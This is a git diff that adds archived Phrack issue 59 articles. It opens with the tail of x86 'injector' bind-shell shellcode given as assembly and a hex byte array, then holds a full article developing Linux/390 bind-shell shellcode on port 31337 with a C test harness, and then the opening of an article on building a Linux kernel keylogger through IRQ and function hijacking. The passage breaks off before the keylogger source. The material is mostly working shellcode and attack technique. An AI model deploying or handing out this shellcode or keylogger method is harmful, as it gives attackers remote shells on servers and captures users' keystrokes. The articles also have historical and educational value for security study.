+int $0x80 /* accept */
+
+xchg %eax,%ebx /* Save our precious file descriptor */
+pop %ecx /* take the value of %edi, that's usualy %ebx-1 */
+duploop:
+mov $63,%al /* dup2 */
+int $0x80
+dec %ecx
+cmp %ecx,%edx
+jle duploop
+
+//jnl loop /* For each file descriptor before %ebx, dup2() it */
+
+
+/* Std lnx_bin_sh_1 shellcode */
+push %edx
+push $0x68732f6e
+push  $0x69622f2f
+mov %esp,%ebx
+push %edx
+push %ebx
+mov %esp,%ecx
+mov $11, %al
+int $0x80
+
+.string ""
+
+</injector.s>
+
+<injector.h>
+ // compiled with -DLONG
+ // binds to port 16705
+char injector_lnx[]= 
+"\xbc\x04\xfe\xff\xbf\x31\xc0\xb0\x40\xcd"
+"\x80\x89\xe5\x89\x45\x0c\x31\xc0\xb0\x1a"
+"\x8b\x4d\x0c\x89\xc3\xb3\x10\xcd\x80\x31"
+"\xdb\x39\xc3\x74\x06\x41\x89\x4d\x0c\xeb"
+"\xe7\x89\xc2\x89\xcb\x89\xd1\xb0\x07\xcd"
+"\x80\x31\xc0\x31\xdb\x89\xee\x83\xc6\x10"
+"\xb3\x0c\x8b\x4d\x0c\xb0\x1a\xcd\x80\x83"
+"\x6d\x4c\x04\x8b\x7d\x4c\x66\x81\xef\x0c"
+"\x04\x89\x7d\x08\xb0\x1a\xb3\x04\x8b\x4d"
+"\x0c\x8b\x55\x4c\x8b\x75\x40\xcd\x80\x89"
+"\x7d\x40\x31\xc0\x31\xdb\xb0\x1a\xb3\x0d"
+"\x89\xee\x83\xc6\x10\xcd\x80\xeb\x34\x89"
+"\xfa\x4a\x4a\x5f\x31\xc0\xb0\x1e\x89\xc4"
+"\xb3\x04\xb0\x1a\x8b\x4d\x0c\x8b\x37\xcd"
+"\x80\x4c\x83\xc2\x04\x83\xc7\x04\x39\xe0"
+"\x75\xec\xb0\x1a\x31\xdb\xb3\x11\x8b\x4d"
+"\x0c\xcd\x80\x31\xc0\x89\xc3\xb0\x01\xcd"
+"\x80\xe8\xc7\xff\xff\xff\x90\x90\x60\x31"
+"\xc0\xb0\x02\xcd\x80\x31\xdb\x39\xc3\x74"
+"\x02\x61\xc3\x31\xc0\x99\x52\x42\x89\xd3"
+"\x52\x42\x52\x89\xe1\xb0\x66\xcd\x80\x89"
+"\xc7\x99\x43\x52\x68\x02\xff\x41\x41\x89"
+"\xe6\x6a\x10\x56\x57\x89\xe1\xb0\x66\xcd"
+"\x80\x43\x43\xb0\x66\xcd\x80\x54\x56\x57"
+"\x43\x89\xe1\xb0\x66\xcd\x80\x93\x59\xb0"
+"\x3f\xcd\x80\x49\x39\xca\x7e\xf7\x52\x68"
+"\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89"
+"\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80" ;
+ /*size :279 */
+</injector.h>
diff --git a/phrack59/13.txt b/phrack59/13.txt
new file mode 100644
index 0000000..41c199e
--- /dev/null
+++ b/phrack59/13.txt
@@ -0,0 +1,496 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x3b, Phile #0x0d of 0x12
+
+|=----------------=[ Linux/390 shellcode development ]=------------------=|
+|=-----------------------------------------------------------------------=|
+|=-------=[ johnny cyberpunk <jcyberpunk@thehackerschoice.com> ]=--------=|
+
+
+--[ Contents
+
+  1 - Introduction
+
+  2 - History and facts
+    2.1 - Registers
+    2.2 - Instruction set
+    2.3 - Syscalls
+    2.4 - The native code
+    2.5 - Avoiding the evil 0x00 and 0x0a
+    2.6 - The final code
+
+  3 - References
+
+
+
+--[ 1 - Introduction
+
+    Since Linux/390 has been released by IBM more and more b0xes of this
+type can be found in the wild. A good reason for a hacker to get a closer
+look on how vulnerable services can be exploited on a mainframe. Remember,
+who are the owners of mainframes ? Yeah, big computer centres, insurances
+or goverments. Well, in this article I'll uncover how to write the bad code
+(aka shellcode). The bind-shellcode at the end should be taken as an 
+example. Other shellcode and exploit against some known vulnerabilities can
+be found on a seperate link (see References) in the next few weeks.
+
+    Suggestions, improvements or flames can be send directly to the email
+address posted in the header of this article. My gpg-key can be found at
+the document bottom.
+
+
+--[ 2 - History and facts
+
+    In late 1998 a small team of IBM developers from Boeblingen/Germany
+started to port Linux to mainframes. One year later in December 1999 the
+first version has been published for the IBM s/390. There are two versions
+available:
+
+    A 32 bit version, referred to as Linux on s/390 and a 64 bit version, 
+referred to as Linux on zSeries. Supported distros are Suse, Redhat and
+TurboLinux. Linux for s/390 is based on the kernel 2.2, the zSeries is
+based on kernel 2.4. There are different ways to run Linux:
+
+Native       - Linux runs on the entire machine, with no other OS
+LPAR         - Logical PARtition): The hardware can be logically
+               partitioned, for example, one LPAR hosts a VM/VSE
+               environment and another LPAR hosts Linux. 
+VM/ESA Guest - means that a customer can also run Linux in a virtual
+               machine
+
+The binaries are in ELF format (big endianess).
+
+
+
+
+----[ 2.1 - Registers
+
+    For our shellcode development we really don't need the whole bunch of
+registers the s/390 or zSeries has. The most interesting for us are the
+registers %r0-%r15. Anyway I'll list some others here for to get an
+overview.
+
+General propose registers        : 
+        %r0-%r15 or gpr0-gpr15 are used for addressing and arithmetic
+        
+Control registers                : 
+        cr0-cr15 are only used by kernel for irq control, memory
+        management, debugging control ...
+        
+Access registers                 :
+        ar0-ar15 are normally not used by programs, but good for 
+        temporary storage
+        
+Floating point registers        :
+        fp0-fp15 are IEEE and HFP floating ( Linux only uses IEEE )
+        
+PSW ( Programm Status Word )        :
+        is the most important register and serves the roles of a program
+        counter, memory space designator and condition code register.
+        For those who wanna know more about this register, should take
+        a closer look on the references at the bottom.
+        
+
+
+        
+----[ 2.2 - Instruction set
+
+Next I'll show you some useful instructions we will need, while developing
+our shellcode.
+
+
+Instruction                        Example
+---------------------------------------------------------------------------
+basr (branch and save)        %r1,0               # save value 0 to %r1
+lhi  (load h/word immediate)  lhi %r4,2           # load value 2 into %r4
+la   (load address)           la %r3,120(%r15)    # load address from
+                                                  # %r15+120 into %r3
+lr   (load register)          lr %r4,%r9          # load value from %r9
+                                                  # into %r4
+stc  (store character)        stc %r6,120(%r15)   # store 1 character from
+                                                  # %r6 to %r15+120
+sth  (store halfword)         sth %r3,122(%r15)   # store 2 bytes from
+                                                  # %r3 to %r15+122
+ar   (add)                    ar %r6,%r10         # add value in %r10 ->%r6
+xr   (exclusive or)           xr %r2,%r2          # 0x00 trick :)
+svc  (service call)           svc 1               # exit
+
+
+
+
+----[ 2.3 - Syscalls
+
+    On Linux for s/390 or zSeries syscalls are done by using the
+instruction SVC with it's opcode 0x0a ! This is no good message for
+shellcoders, coz 0x0a is a special character in a lot of services. But
+before i start explaining how we can avoid using this call let's have a
+look on how our OS is using the syscalls.
+
+    The first four parameters of a syscall are delivered to the registers
+%r2-%r5 and the resultcode can be found in %r2 after the SVC call.
+
+Example of an execve call:
+
+        basr	  %r1,0
+base:
+        la        %r2,exec-base(%r1)
+        la        %r3,arg-base(%r1)
+        la        %r4,tonull-base(%r1)
+        svc     11
+
+exec:
+        .string  "/bin//sh"
+arg:        
+        .long   exec 
+tonull:
+        .long   0x0
+        
+
+    A special case is the SVC call 102 (SYS_SOCKET). First we have to feed
+the register %r2 with the desired function ( socket, bind, listen, accept, 
+....) and %r3 points to a list of parameters this function needs. Every
+parameter in this list has its own u_long value.
+
+And again an example of a socket() call :
+
+        lhi        %r2,2                # domain
+        lhi        %r3,1                # type
+        xr         %r4,%r4              # protocol
+        stm        %r2,%r4,128(%r15)    # store %r2 - %r4
+        lhi        %r2,1                # function socket()
+        la         %r3,128(%r15)        # pointer to the API values
+        svc        102                  # SOCKETCALL
+        lr         %r7,%r2              # save filedescriptor to %r7
+
+        
+
+
+        
+----[ 2.4 - The native code
+
+So now, here is a sample of a complete portbindshell in native style :
+
+        .globl _start
+        
+_start:
+        basr       %r1,0                     # our base-address
+base:
+
+        lhi        %r2,2                     # AF_INET
+        sth        %r2,120(%r15)
+        lhi        %r3,31337                 # port
+        sth        %r3,122(%r15)
+        xr         %r4,%r4                   # INADDR_ANY
+        st         %r4,124(%r15)             # 120-127 is struct sockaddr *
+        lhi        %r3,1                     # SOCK_STREAM
+        stm        %r2,%r4,128(%r15)         # store %r2-%r4, our API values
+        lhi        %r2,1                     # SOCKET_socket
+        la         %r3,128(%r15)             # pointer to the API values
+        svc        102                       # SOCKETCALL 
+        lr         %r7,%r2                   # save socket fd to %r7
+        la         %r3,120(%r15)             # pointer to struct sockaddr *
+        lhi        %r9,16                    # save value 16 to %r9
+        lr         %r4,%r9                   # sizeof address
+        stm        %r2,%r4,128(%r15)         # store %r2-%r4, our API values
+        lhi        %r2,2                     # SOCKET_bind
+        la         %r3,128(%r15)             # pointer to the API values
+        svc        102                       # SOCKETCALL
+        lr         %r2,%r7                   # get saved socket fd
+        lhi        %r3,1                     # MAXNUMBER
+        stm        %r2,%r3,128(%r15)         # store %r2-%r3, our API values
+        lhi        %r2,4                     # SOCKET_listen
+        la         %r3,128(%r15)             # pointer to the API values
+        svc        102                       # SOCKETCALL
+        lr         %r2,%r7                   # get saved socket fd
+        la         %r3,120(%r15)             # pointer to struct sockaddr *
+        stm        %r2,%r3,128(%r15)         # store %r2-%r3,our API values
+        st         %r9,136(%r15)             # %r9 = 16, this case: fromlen
+        lhi        %r2,5                     # SOCKET_accept
+        la         %r3,128(%r15)             # pointer to the API values
+        svc        102                       # SOCKETCALL
+        xr         %r3,%r3                   # the following shit
+        svc        63                        # duplicates stdin, stdout
+        ahi        %r3,1                     # stderr
+        svc        63                        # DUP2
+        ahi        %r3,1                        
+        svc        63                        
+        la         %r2,exec-base(%r1)        # point to /bin/sh
+        la         %r3,arg-base(%r1)         # points to address of /bin/sh
+        la         %r4,tonull-base(%r1)      # point to envp value
+        svc        11                        # execve
+        slr        %r2,%r2                        
+        svc        1                         # exit
+        
+exec:
+        .string  "/bin//sh"
+arg:
+        .long   exec
+tonull:
+        .long   0x0                
+
+
+
+
+----[ 2.5 - Avoiding 0x00 and 0x0a
+
+    To get a clean working shellcode we have two things to bypass. First
+avoiding 0x00 and second avoiding 0x0a.
+
+Here is our first case :
+
+a7 28 00 02             lhi     %r2,02
+
+And here is my solution :
+
+a7 a8 fb b4             lhi     %r10,-1100
+a7 28 04 4e             lhi     %r2,1102
+1a 2a                   ar      %r2,%r10
+
+    I statically define a value -1100 in %r10 to use it multiple times.
+After that i load my wanted value plus 1100 and in the next instruction
+the subtraction of 1102-1100 gives me the real value. Quite easy.
+
+To get around the next problem we have to use selfmodifing code:
+
+svc:
+        .long 0x0b6607fe          <---- will be svc 66, br %r14 after
+                                        code modification
+
+    Look at the first byte, it has the value 0x0b at the moment. The
+following code changes this value to 0x0a:
+
+basr      %r1,0                   # our base-address
+la        %r9,svc-base(%r1)       # load address of svc subroutine
+lhi       %r6,1110                # selfmodifing
+lhi       %r10,-1100              # code is used 
+ar        %r6,%r10                # 1110 - 1100 = \x0a opcode SVC
+stc       %r6,svc-base(%r1)       # store svc opcode
+
+Finally the modified code looks as follows :
+
+0a 66                svc 66
+07 fe                br %r14
+
+To branch to this subroutine we use the following command :
+
+basr        	     %r14,%r9     # branch to subroutine SVC 102
+
+    The Register %r9 has the address of the subroutine and %r14 contains
+the address where to jump back.
+
+
+
+
+----[ 2.6 - The final code
+
+Finally we made it, our shellcode is ready for a first test:
+
+        .globl _start
+        
+_start:
+        basr      %r1,0                   # our base-address
+base:
+        la        %r9,svc-base(%r1)       # load address of svc subroutine
+        lhi       %r6,1110                # selfmodifing
+        lhi       %r10,-1100              # code is used 
+        ar        %r6,%r10                # 1110 - 1100 = \x0a opcode SVC
+        stc       %r6,svc-base(%r1)       # store svc opcode 
+        lhi       %r2,1102                # portbind code always uses
+        ar        %r2,%r10                # real value-1100 (here AF_INET)
+        sth       %r2,120(%r15)
+        lhi       %r3,31337               # port
+        sth       %r3,122(%r15)
+        xr        %r4,%r4                 # INADDR_ANY
+        st        %r4,124(%r15)           # 120-127 is struct sockaddr *
+        lhi       %r3,1101                # SOCK_STREAM
+        ar        %r3,%r10
+        stm       %r2,%r4,128(%r15)       # store %r2-%r4, our API values
+        lhi       %r2,1101                # SOCKET_socket
+        ar        %r2,%r10
+        la        %r3,128(%r15)           # pointer to the API values
+        basr      %r14,%r9                # branch to subroutine SVC 102
+        lr        %r7,%r2                 # save socket fd to %r7
+        la        %r3,120(%r15)           # pointer to struct sockaddr *
+        lhi       %r8,1116                
+        ar        %r8,%r10                # value 16 is stored in %r8
+        lr        %r4,%r8                 # size of address
+        stm       %r2,%r4,128(%r15)       # store %r2-%r4, our API values
+        lhi       %r2,1102                # SOCKET_bind
+        ar        %r2,%r10
+        la        %r3,128(%r15)           # pointer to the API values
+        basr      %r14,%r9                # branch to subroutine SVC 102
+        lr        %r2,%r7                 # get saved socket fd
+        lhi       %r3,1101                # MAXNUMBER
+        ar        %r3,%r10
+        stm       %r2,%r3,128(%r15)       # store %r2-%r3, our API values
+        lhi       %r2,1104                # SOCKET_listen
+        ar        %r2,%r10
+        la        %r3,128(%r15)           # pointer to the API values
+        basr      %r14,%r9                # branch to subroutine SVC 102
+        lr        %r2,%r7                 # get saved socket fd
+        la        %r3,120(%r15)           # pointer to struct sockaddr *
+        stm       %r2,%r3,128(%r15)       # store %r2-%r3, our API values
+        st        %r8,136(%r15)           # %r8 = 16, in this case fromlen
+        lhi       %r2,1105                # SOCKET_accept
+        ar        %r2,%r10
+        la        %r3,128(%r15)           # pointer to the API values
+        basr      %r14,%r9                # branch to subroutine SVC 102
+        lhi       %r6,1163                # initiate SVC 63 = DUP2
+        ar        %r6,%r10
+        stc       %r6,svc+1-base(%r1)        # modify subroutine to SVC 63
+        lhi       %r3,1102                # the following shit
+        ar        %r3,%r10                # duplicates
+        basr      %r14,%r9                # stdin, stdout
+        ahi       %r3,-1                        # stderr
+        basr      %r14,%r9                # SVC 63 = DUP2
+        ahi       %r3,-1
+        basr      %r14,%r9
+        lhi       %r6,1111                # initiate SVC 11 = execve
+        ar        %r6,%r10
+        stc       %r6,svc+1-base(%r1)     # modify subroutine to SVC 11
+        la        %r2,exec-base(%r1)      # point to /bin/sh
+        st        %r2,exec+8-base(%r1)    # save address to /bin/sh
+        la        %r3,exec+8-base(%r1)    # points to address of /bin/sh
+        xr        %r4,%r4                 # 0x00 is envp
+        stc       %r4,exec+7-base(%r1)    # fix last byte /bin/sh\\ to 0x00
+        st        %r4,exec+12-base(%r1)   # store 0x00 value for envp
+        la        %r4,exec+12-base(%r1)   # point to envp value
+        basr      %r14,%r9                # branch to subroutine SVC 11
+svc:
+        .long 0x0b6607fe                  # our subroutine SVC n + br %r14
+exec:
+        .string  "/bin/sh\\"
+        
+
+In a C-code environment it looks like this :
+
+char shellcode[]=
+"\x0d\x10"		/* basr    %r1,%r0				*/
+"\x41\x90\x10\xd4"	/* la      %r9,212(%r1)				*/
+"\xa7\x68\x04\x56"	/* lhi     %r6,1110				*/
+"\xa7\xa8\xfb\xb4"	/* lhi     %r10,-1100				*/
+"\x1a\x6a"		/* ar      %r6,%r10				*/
+"\x42\x60\x10\xd4"	/* stc     %r6,212(%r1)				*/
+"\xa7\x28\x04\x4e"	/* lhi     %r2,1102				*/
+"\x1a\x2a"		/* ar      %r2,%r10				*/
+"\x40\x20\xf0\x78"	/* sth     %r2,120(%r15)			*/
+"\xa7\x38\x7a\x69"	/* lhi     %r3,31337				*/
+"\x40\x30\xf0\x7a"	/* sth     %r3,122(%r15)			*/
+"\x17\x44"		/* xr      %r4,%r4				*/
+"\x50\x40\xf0\x7c"	/* st      %r4,124(%r15)			*/
+"\xa7\x38\x04\x4d"	/* lhi     %r3,1101				*/
+"\x1a\x3a"		/* ar      %r3,%r10				*/
+"\x90\x24\xf0\x80"	/* stm     %r2,%r4,128(%r15)			*/
+"\xa7\x28\x04\x4d"	/* lhi     %r2,1101				*/
+"\x1a\x2a"		/* ar      %r2,%r10				*/
+"\x41\x30\xf0\x80"	/* la      %r3,128(%r15)			*/
+"\x0d\xe9"		/* basr    %r14,%r9				*/
+"\x18\x72"		/* lr      %r7,%r2				*/
+"\x41\x30\xf0\x78"	/* la      %r3,120(%r15)			*/
+"\xa7\x88\x04\x5c"	/* lhi     %r8,1116				*/
+"\x1a\x8a"		/* ar      %r8,%r10				*/
+"\x18\x48"		/* lr      %r4,%r8				*/
+"\x90\x24\xf0\x80"	/* stm     %r2,%r4,128(%r15)			*/
+"\xa7\x28\x04\x4e"	/* lhi     %r2,1102				*/
+"\x1a\x2a"		/* ar      %r2,%r10				*/
+"\x41\x30\xf0\x80"	/* la      %r3,128(%r15)			*/
+"\x0d\xe9"		/* basr    %r14,%r9				*/
+"\x18\x27"		/* lr      %r2,%r7				*/
+"\xa7\x38\x04\x4d"	/* lhi     %r3,1101				*/
+"\x1a\x3a"		/* ar      %r3,%r10				*/
+"\x90\x23\xf0\x80"	/* stm     %r2,%r3,128(%r15)			*/
+"\xa7\x28\x04\x50"	/* lhi     %r2,1104				*/
+"\x1a\x2a"		/* ar      %r2,%r10				*/
+"\x41\x30\xf0\x80"	/* la      %r3,128(%r15)			*/
+"\x0d\xe9"		/* basr    %r14,%r9				*/
+"\x18\x27"		/* lr      %r2,%r7				*/
+"\x41\x30\xf0\x78"	/* la      %r3,120(%r15)			*/
+"\x90\x23\xf0\x80"	/* stm     %r2,%r3,128(%r15)			*/
+"\x50\x80\xf0\x88"	/* st      %r8,136(%r15)			*/
+"\xa7\x28\x04\x51"	/* lhi     %r2,1105				*/
+"\x1a\x2a"		/* ar      %r2,%r10				*/
+"\x41\x30\xf0\x80"	/* la      %r3,128(%r15)			*/
+"\x0d\xe9"		/* basr    %r14,%r9				*/
+"\xa7\x68\x04\x8b"	/* lhi     %r6,1163				*/
+"\x1a\x6a"		/* ar      %r6,%r10				*/
+"\x42\x60\x10\xd5"	/* stc     %r6,213(%r1)				*/
+"\xa7\x38\x04\x4e"	/* lhi     %r3,1102				*/
+"\x1a\x3a"		/* ar      %r3,%r10				*/
+"\x0d\xe9"		/* basr    %r14,%r9				*/
+"\xa7\x3a\xff\xff"	/* ahi     %r3,-1				*/
+"\x0d\xe9"		/* basr    %r14,%r9				*/
+"\xa7\x3a\xff\xff"	/* ahi     %r3,-1				*/
+"\x0d\xe9"		/* basr    %r14,%r9				*/
+"\xa7\x68\x04\x57"	/* lhi     %r6,1111				*/
+"\x1a\x6a"		/* ar      %r6,%r10				*/
+"\x42\x60\x10\xd5"	/* stc     %r6,213(%r1)				*/
+"\x41\x20\x10\xd8"	/* la      %r2,216(%r1)				*/
+"\x50\x20\x10\xe0"	/* st      %r2,224(%r1)				*/
+"\x41\x30\x10\xe0"	/* la      %r3,224(%r1)				*/
+"\x17\x44"		/* xr      %r4,%r4				*/
+"\x42\x40\x10\xdf"	/* stc     %r4,223(%r1)				*/
+"\x50\x40\x10\xe4"	/* st      %r4,228(%r1)				*/
+"\x41\x40\x10\xe4"	/* la      %r4,228(%r1)				*/
+"\x0d\xe9"		/* basr    %r14,%r9				*/
+"\x0b\x66"		/* svc	   102 		<--- after modification	*/
+"\x07\xfe"		/* br      %r14					*/
+"\x2f\x62\x69\x6e"	/* /bin						*/
+"\x2f\x73\x68\x5c";	/* /sh\						*/
+
+main()
+{
+ void (*z)()=(void*)shellcode;
+ z();
+}
+
+
+
+
+--[ 3 - References:
+
+
+[1] z/Architecture Principles of Operation (SA22-7832-00) 
+    http://publibz.boulder.ibm.com/epubs/pdf/dz9zr000.pdf
+
+[2] Linux for S/390 ( SG24-4987-00 )
+    http://www.redbooks.ibm.com/pubs/pdfs/redbooks/sg244987.pdf
+
+[3] LINUX for S/390 ELF Application Binary Interface Supplement
+    http://oss.software.ibm.com/linux390/docu/l390abi0.pdf
+
+[4] Example exploits
+    http://www.thehackerschoice.com/misc/sploits/
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: GnuPG v1.0.6 (GNU/Linux)
+Comment: Weitere Infos: siehe http://www.gnupg.org
+
+mQGiBDzw5yMRBACGJ1o25Bfbb6mBkP2+qwd0eCTvCmC5uJGdXWOW8BbQwDHkoO4h
+sdouA+0JdlTFIQriCZhZWbspNsWEpXPOAW8vG3fSqIUqiDe6Aj21h+BnW0WEqx9t
+8TkooEVS3SL34wiDCig3cQtmvAIj0C9g4pj5B/QwHJYrWNFoAxc2SW1lXwCg8Wk9
+LawvHW+Xqnc6n/w5Oo8IpNsD/2Lp4fvQFiTvN22Jd63nCQ75A64fB7mH7ZUsVPYy
+BctYXM4GhcHx7zfOhAbJQNWoNmYGiftVr9UvO9GSnG+Y9jq6I16qOn7T7dIZUEpL
+F5FevEFTyrtDGYmBhGv9hwtbz3CI9n9gpZxz1xYTbDHxkVIiTMlcNR3GIJRPfo5B
+a7u4A/9ncKqRx2HbRkaj39zugC6Y28z9lSimGzu7PTVw3bxDbObgi4CyHcjnHe+j
+DResuKGgdyEf+d07ofbFEOdQjgaDx1mmswS4pcILKOyRdQMtdbgSdyPlJw5KGHLX
+G0hrHV/Uhgok3W6nC43ZvPWbd3HVfOIU8jDTRgWaRDjGc45dtbQkam9obm55IGN5
+YmVycHVuayA8am9obmN5YnBrQGdteC5uZXQ+iFcEExECABcFAjzw5yMFCwcKAwQD
+FQMCAxYCAQIXgAAKCRD3c5EGutq/jMW7AJ9OSmrB+0vMgPfVOT4edV7C++RNHwCf
+byT/qKeSawxasF8g4HeX33fSPe25Ag0EPPDnrRAIALdcTn8E2Z8Z4Ua4p8fjwXNO
+iP6GOANUN5XLpmscv9v5ErPfK+NM2ARb7O7rQJfLkmKV8voPNj4lPUUyltGeOhzj
+t86I5p68RRSvO5JKTW+riZamaD8lB84YqLzmt9OuzuOeAJCq3GuQtPMyrNuOkPL9
+nX51EgnLnYaUYAkysAhYLhlrye/3maNdjtn2T63MoJauAoB4TpKvegsGsf1pA5mj
+y9fuG6zGnWt8XpVSdD2W3PUJB+Q7J3On35byebIKiuGsti6Y5L0ZSDlW2rveZp9g
+eRSQz06j+mxAooTUMBBJwMmXjHm5nTgr5OX/8mpb+I73MGhtssRr+JW+EWSLQN8A
+AwcH/iqRCMmPB/yiMhFrEPUMNBsZOJ+VK3PnUNLbAPtHz7E2ZmEpTgdvLR3tjHTC
+vZO6k40H1BkodmdFkCHEwzhWwe8P3a+wgW2LnPCM6tfPEfp9kPXD43UlTLWLL4RF
+cPmyrs45B2uht7aE3Pe0SgbsnWAej87Stwb+ezOmngmrRvZKnYREVR1RHRRsH3l6
+C4rexD3uHjFNdEXieW97xHG71YpOVDX6slCK2SumfxzQAEZC2n7/DqwPd6Z/abAf
+Ay9WmTpqBFd2FApUtZ1h8cpS6MYb6A5R2BDJQl1hN2pQFNzIh8chjVdQc67dKiay
+R/g0Epg0thiVAecaloCJlJE8b3OIRgQYEQIABgUCPPDnrQAKCRD3c5EGutq/jNuP
+AJ979IDls926vsxlhRA5Y8G0hLyDAwCgo8eWQWI7Y+QVfwBG8XCzei4oAiI=
+=2B7h
+-----END PGP PUBLIC KEY BLOCK-----
+
+
+|=[ EOF ]=---------------------------------------------------------------=|
diff --git a/phrack59/14.txt b/phrack59/14.txt
new file mode 100644
index 0000000..2845210
--- /dev/null
+++ b/phrack59/14.txt
@@ -0,0 +1,1650 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x3b, Phile #0x0e of 0x12
+
+
+|=-----------------=[ Writing Linux Kernel Keylogger ]=------------------=|
+|=-----------------------------------------------------------------------=|
+|=------------------=[ rd <rd@thehackerschoice.com> ]=-------------------=|
+|=------------------------=[ June 19th, 2002 ]=--------------------------=|
+
+--[ Contents
+
+ 1 - Introduction
+
+ 2 - How Linux keyboard driver work
+
+ 3 - Kernel based keylogger approaches
+   3.1 - Interrupt handler
+   3.2 - Function hijacking
+       3.2.1 - handle_scancode
+       3.2.2 - put_queue
+       3.2.3 - receive_buf
+       3.2.4 - tty_read
+       3.2.5 - sys_read/sys_write
+
+ 4 - vlogger
+   4.1 - The syscall/tty approach
+   4.2 - Features
+   4.3 - How to use
+
+ 5 - Greets
+
+ 6 - References
+
+ 7 - Keylogger source
+
+
+
+
+--[ 1 - Introduction
+
+  This article is divided into two parts.  The first part of the paper
+gives an overview on how the linux keyboard driver work, and discusses
+methods that can be used to create a kernel based keylogger.  This part
+will be useful for those who want to write a kernel based keylogger, or to
+write their own keyboard driver (for supporting input of non-supported
+language in linux environment, ...) or to program taking advantage of many
+features in the Linux keyboard driver.
+
+  The second part presents detail of vlogger, a smart kernel based linux
+keylogger, and how to use it.  Keylogger is a very interesting code being
+used widely in honeypots, hacked systems, ... by white and black hats.  As
+most of us known, besides user space keyloggers (such as iob, uberkey,
+unixkeylogger, ...), there are some kernel based keyloggers.  The earliest
+kernel based keylogger is linspy of halflife which was published in Phrack
+50 (see [4]).  And the recent kkeylogger is presented in 'Kernel Based
+Keylogger' paper by mercenary (see [7]) that I found when was writing this
+paper.  The common method of those kernel based keyloggers using is to log
+user keystrokes by intercepting sys_read or sys_write system call.
+However, this approach is quite unstable and slowing down the whole system
+noticeably because sys_read (or sys_write) is the generic read/write
+function of the system; sys_read is called whenever a process wants to read
+something from devices (such as keyboard, file, serial port, ...).  In
+vlogger, I used a better way to implement it that hijacks the tty buffer
+processing function.
+
+  The reader is supposed to possess the knowledge on Linux Loadable Kernel
+Module.  Articles [1] and [2] are recommended to read before further
+reading.
+
+
+--[ 2 - How Linux keyboard driver work
+
+  Lets take a look at below figure to know how user inputs from console
+keyboard are processed:
+
+  _____________            _________             _________         
+ /             \ put_queue|         |receive_buf|         |tty_read
+/handle_scancode\-------->|tty_queue|---------->|tty_ldisc|------->
+\               /         |         |           |buffer   |        
+ \_____________/          |_________|           |_________|        
+
+     _________          ____________
+    |         |sys_read|            |
+--->|/dev/ttyX|------->|user process|
+    |         |        |            |
+    |_________|        |____________|
+
+
+                            Figure 1
+
+  First, when you press a key on the keyboard, the keyboard will send
+corresponding scancodes to keyboard driver.  A single key press can produce
+a sequence of up to six scancodes.
+
+  The handle_scancode() function in the keyboard driver parses the stream
+of scancodes and converts it into a series of key press and key release
+events called keycode by using a translation-table via kbd_translate()
+function.  Each key is provided with a unique keycode k in the range 1-127.
+Pressing key k produces keycode k, while releasing it produces keycode
+k+128. 
+
+  For example, keycode of 'a' is 30. Pressing key 'a' produces keycode 30.
+Releasing 'a' produces keycode 158 (128+30).
+
+  Next, keycodes are converted to key symbols by looking them up on the
+appropriate keymap.  This is a quite complex process. There are eight
+possible modifiers (shift keys - Shift , AltGr, Control, Alt, ShiftL,
+ShiftR, CtrlL and CtrlR), and the combination of currently active modifiers
+and locks determines the keymap used.
+
+  After the above handling, the obtained characters are put into the raw
+tty queue - tty_flip_buffer.
+
+  In the tty line discipline, receive_buf() function is called periodically
+to get characters from tty_flip_buffer then put them into tty read queue.
+
+  When user process want to get user input, it calls read() function on
+stdin of the process. sys_read() function will calls read() function
+defined in file_operations structure (which is pointed to tty_read) of
+corresponding tty (ex /dev/tty0) to read input characters and return to the
+process.
+
+  The keyboard driver can be in one of 4 modes:
+	- scancode (RAW MODE): the application gets scancodes for input.  
+	It is used by applications that implement their own keyboard 
+	driver (ex: X11)
+
+	- keycode (MEDIUMRAW MODE): the application gets information on
+	which keys (identified by their keycodes) get pressed and 
+	released.
+
+	- ASCII (XLATE MODE): the application effectively gets the 
+	characters as defined by the keymap, using an 8-bit encoding.
+
+	- Unicode (UNICODE MODE): this mode only differs from the ASCII 
+	mode by allowing the user to compose UTF8 unicode characters by 
+	their decimal value, using Ascii_0 to Ascii_9, or their 
+	hexadecimal (4-digit) value, using Hex_0 to Hex_9.  A keymap can 
+	be set up to produce UTF8 sequences (with a U+XXXX pseudo-symbol, 
+	where each X is an hexadecimal digit). 
+
+  Those modes influence what type of data that applications will get as
+keyboard input.  For more details on scancode, keycode and keymaps, please
+read [3].
+
+
+--[ 3 - Kernel based keylogger approaches
+
+  We can implement a kernel based keylogger in two ways by writing our own
+keyboard interrupt handler or hijacking one of input processing functions. 
+
+
+----[ 3.1 - Interrupt handler
+
+  To log keystrokes, we will use our own keyboard interrupt handler.  Under
+Intel architectures, the IRQ of the keyboard controlled is IRQ 1.  When
+receives a keyboard interrupt, our own keyboard interrupt handler read the
+scancode and keyboard status.  Keyboard events can be read and written via
+port 0x60(Keyboard data register) and 0x64(Keyboard status register).
+
+/* below code is intel specific */
+#define KEYBOARD_IRQ 1 
+#define KBD_STATUS_REG 0x64 
+#define KBD_CNTL_REG 0x64 
+#define KBD_DATA_REG 0x60 
+
+#define kbd_read_input() inb(KBD_DATA_REG) 
+#define kbd_read_status() inb(KBD_STATUS_REG) 
+#define kbd_write_output(val) outb(val, KBD_DATA_REG) 
+#define kbd_write_command(val) outb(val, KBD_CNTL_REG) 
+
+/* register our own IRQ handler */
+request_irq(KEYBOARD_IRQ, my_keyboard_irq_handler, 0, "my keyboard", NULL);
+
+In my_keyboard_irq_handler():
+	scancode = kbd_read_input(); 
+	key_status = kbd_read_status(); 
+	log_scancode(scancode);
+
+  This method is platform dependent.  So it won't be portable among
+platforms.  And you have to be very careful with your interrupt handler if
+you don't want to crash your box ;)
+
+
+----[ 3.2 - Function hijacking
+
+   Based on the Figure 1, we can implement our keylogger to log user inputs
+by hijacking one of handle_scancode(), put_queue(), receive_buf(),
+tty_read() and sys_read() functions.  Note that we can't intercept
+tty_insert_flip_char() function because it is an INLINE function.
+
+
+------[ 3.2.1 - handle_scancode
+
+  This is the entry function of the keyboard driver (see keyboard.c).  It
+handles scancodes which are received from keyboard.
+
+# /usr/src/linux/drives/char/keyboard.c
+void handle_scancode(unsigned char scancode, int down);
+
+  We can replace original handle_scancode() function with our own to logs
+all scancodes.  But handle_scancode() function is not a global and exported
